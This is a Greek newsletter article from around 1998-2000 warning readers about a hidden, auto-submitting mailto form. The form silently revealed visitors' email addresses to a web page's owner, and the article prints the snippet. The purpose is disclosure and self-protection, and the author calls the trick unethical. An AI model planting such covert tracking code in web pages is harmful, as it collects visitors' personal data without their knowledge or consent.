[InterBIZ Newsletter Logo]

Μια "χακιά" που συνάντησα πρόσφατα

Προσοχή! Η παρακάτω τεχνική αναφέρεται για την ενημέρωσή σας και μόνο. Θεωρώ τη χρήση της ανήθικη και απαράδεκτη. Την εξηγώ όμως αναλυτικά για δύο λόγους:

  1. Έχω βαρεθεί να διαβάζω για χακιές που υποτίθεται πως ξέρουν όλοι αλλά τις κρατούν μυστικές για να μην διαδοθούν.
  2. Υπάρχουν μερικές περιπτώσεις που μπορεί να είναι χρήσιμη (π.χ. αν έχετε σελίδα προστατευμένη με password και θέλετε να βεβαιωθείτε πως δεν βρήκε κάποιος τρόπο να το παρακάμπτει).

Γιώργος Επιτήδειος

Το κείμενο του άρθρου:

Τις προάλλες, φόρτωσα μια Web σελίδα με τον Internet Explorer 4. Ενώ όμως, η σελίδα αποτελείτο από σκέτο κείμενο, στην οθόνη μου εμφανίστηκε το γνωστό παραθυράκι επιβεβαίωσης του Explorer που ρωτούσε αν πράγματι θέλω να υποβάλω τη φόρμα!

Μια και δεν είχα συμπληρώσει καμία φόρμα, προτίμησα να πω όχι και μετά άρχισα να ψάχνω τη σελίδα μήπως και βρω τίποτε (π.χ. μια έτοιμη, συμπληρωμένη, φόρμα που ενεργοποιήθηκε επειδή πάτησα κατά λάθος το enter). Η σελίδα όμως φαινόταν καθαρή και έτσι αναγκάστηκα να κοιτάξω τον κώδικά της. Εκεί βρήκα τις ακόλουθες ρυθμίσεις:

...<BODY onLoad="document.mailme.submit()"> <CENTER><FORM method=post name="mailme" action="mailto:emailaddress@somewhere.com?subject=gurdjieff accesslog"><INPUT type=hidden name="address" value="OK"></FORM></CENTER>...

Τι σημαίνουν αυτά; Ότι ο κατασκευαστής της σελίδας δημιούργησε μια κρυφή φόρμα η οποία, όταν φορτώνεται η σελίδα, του στέλνει (στη διεύθυνση emailaddress@somewhere.com) ένα email χρησιμοποιώντας τον default mailer του browser. Το email είναι κενό και το subject το ορίζει αυτός (subject=gurdjieff accesslog). Αφού όμως λαμβάνει ένα email από το δικό μου πρόγραμμα ηλεκτρονικού ταχυδρομείου, μαθαίνει και ποια είναι η δικιά μου email διεύθυνση!

Έγραψα στον συγκεκριμένο κύριο και φαίνεται πως οι διαθέσεις του δεν είναι "κακές". Απλώς θέλει να βλέπει πόσοι και ποιοι επισκέπτονται τη σελίδα του. Το πρόβλημα όμως παραμένει. Αν το θέλουν, κάποιοι μπορούν πολύ εύκολα να μάθουν ποιοι είμαστε όταν βλέπουμε τις σελίδες τους. Σημειώστε μάλιστα πως όταν φόρτωσα την ίδια σελίδα με το Navigator (έκδοση 4.07), μου δήλωσε ότι ενεργοποιεί την java (starting java), αν και δεν υπάρχει κανένα applet στη σελίδα, και έστειλε το email χωρίς να μου δώσει καμία ενημέρωση.

Καλά θα κάνουμε λοιπόν να είμαστε πιο προσεκτικοί στα διάφορα μηνύματα που εμφανίζουν κατά καιρούς οι browsers και να ψάξουμε περισσότερο το θέμα της ασφάλειάς μας. Ίσως θα ήταν σκόπιμο να μη χρησιμοποιούμε πια τον mailer του browser για να διαβάζουμε το email μας ή να του έχουμε δηλώσει μια ψεύτικη διεύθυνση.

Αποκτήστε μια δωρεάν συνδρομή στο InterBIZ

Επιστροφή στο Αρχείο ’ρθρων Παλαιών Τευχών
Επιστροφή στις Επιχειρηματικές Σελίδες

Copyright 1998, 1999, 2000 Γιώργος Επιτήδειος
Υποδείξεις, Ερωτήσεις, Σχόλια στην διεύθυνση gepiti@gepiti.com